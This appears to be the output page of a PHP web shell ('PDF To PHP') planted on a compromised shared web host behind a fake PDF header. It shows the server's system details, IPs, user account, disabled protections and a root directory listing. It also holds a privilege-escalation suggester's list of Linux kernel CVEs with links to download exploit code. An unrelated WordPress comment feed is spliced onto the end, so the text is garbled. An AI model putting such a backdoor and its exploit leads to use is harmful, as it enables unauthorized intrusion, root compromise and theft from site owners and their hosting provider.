%PDF-1.7 3 0 obj << /A /B /C /D /E >> endobj %%EOF PDF To PHP

PDF To PHP

:/ [ drwxr-xr-x ]
System: Linux apophis.o2switch.net 4.18.0-553.111.1.lve.el8.x86_64 #1 SMP Fri Mar 13 13:42:17 UTC 2026 x86_64
Software: Apache
PHP version: 8.2.30 [ PHPINFO ] PHP os: Linux
Server Ip: 109.234.164.184
Your Ip: 216.73.217.19
User: yhnt9884 (1099) | Group: yhnt9884 (1102)
Safe Mode: OFF
MySQL: OFF | Perl: ON | Python: OFF | WGET: ON | CURL: ON
Disable Function:
NONE

Current Directory is Unwriteable !
[+] Loading ...
main: line 1993: rpm: command not found

Available information:

Kernel version: 4.18.0
Architecture: x86_64
Distribution: RHEL
Distribution version: N/A
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: N/A

Searching among:

86 kernel space exploits
0 user space exploits

Possible Exploits:

[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2022-2586] nft_object UAF

   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: less probable
   Tags: ubuntu=(20.04){kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-3493] Ubuntu OverlayFS

   Details: https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/
   Exposure: less probable
   Tags: ubuntu=(14.04|16.04|18.04|20.04|20.10)
   Download URL: https://raw.githubusercontent.com/briskets/CVE-2021-3493/refs/heads/main/exploit.c
   Comments: Only Ubuntu is affected.

[+] [CVE-2021-27365] linux-iscsi

   Details: https://blog.grimm-co.com/2021/03/new-old-bugs-in-linux-kernel.html
   Exposure: less probable
   Tags: RHEL=8
   Download URL: https://codeload.github.com/grimm-co/NotQuite0DayFriday/zip/trunk
   Comments: CONFIG_SLAB_FREELIST_HARDENED must not be enabled

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2019-15666] XFRM_UAF

   Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
   Exposure: less probable
   Download URL: 
   Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled

[+] [CVE-2019-13272] PTRACE_TRACEME

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
   Exposure: less probable
   Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},debian=10{kernel:4.19.0-*},fedora=30{kernel:5.0.9-*}
   Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47133.zip
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
   Comments: Requires an active PolKit agent.

nametype last edit size owner/group permsion action
..
bin dir 2026-05-09 0:15 - root/root drwxr-xr-x
dev dir 2026-05-11 11:10 - root/root drwxr-xr-x
etc dir 2026-05-11 22:18 - root/root drwxr-xr-x
home dir 2024-07-29 21:38 - root/nobody drwxr-xr-x
lib dir 2026-05-04 11:00 - root/root dr-xr-xr-x
lib64 dir 2026-05-06 11:20 - root/root dr-xr-xr-x
opt dir 2026-03-26 9:30 - root/root drwxr-xr-x
proc dir 2026-05-04 8:12 - root/root dr-xr-xr-x
root dir 2022-11-29 16:49 - root/root dr-xr-x---
run dir 2026-05-11 11:10 - root/root drwxr-xr-x
sbin dir 2026-05-09 0:17 - root/root dr-xr-xr-x
tmp dir 2026-05-11 22:46 - yhnt9884/yhnt9884 drwx------
usr dir 2026-05-04 8:12 - root/root drwxr-xr-x
var dir 2026-05-09 0:15 - root/root drwxr-xr-x
©left; PDF To PHP - xfellpramudika
Comments for A7600876848583116 https://julie.retaux.startevo.info/wordpress Mon, 27 Oct 2025 03:38:17 +0000 hourly 1 https://wordpress.org/?v=6.9.4 Comment on Hello world! by A WordPress Commenter https://julie.retaux.startevo.info/wordpress/2025/10/27/hello-world/#comment-1 Mon, 27 Oct 2025 03:38:17 +0000 https://julie.retaux.startevo.info/wordpress/?p=1#comment-1 Hi, this is a comment.
To get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.
Commenter avatars come from Gravatar.

]]>